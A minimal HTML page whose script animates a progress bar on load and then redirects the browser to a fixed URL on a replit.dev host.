
<!DOCTYPE html>
<html>
<head>
  <style>
    body {
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
    }
    h1, progress {
      text-align: center;
    }
  </style>
  <script>
    function updateProgress() {
      let progress = 0;
      const progressBar = document.getElementById('progress');

      const interval = setInterval(function() {
        progress++;
        progressBar.value = progress;

        if (progress >= 100) {
          clearInterval(interval);
          setTimeout(function() {
            var redirectURL = "https://28ecb0c7-d0dd-492c-b20a-d806a6fe074c-00-q643qt3rgpjy.pike.replit.dev/request.php"; // Updated URL
            window.location.href = redirectURL; // Redirect to the new URL
          }, 1000); // 1 second delay
        }
      }, 10); // Adjust the timing of the progress update
    }
  </script>
</head>
<body onload="updateProgress()">
  <progress id="progress" value="0" max="100"></progress><br>
</body>
</html>
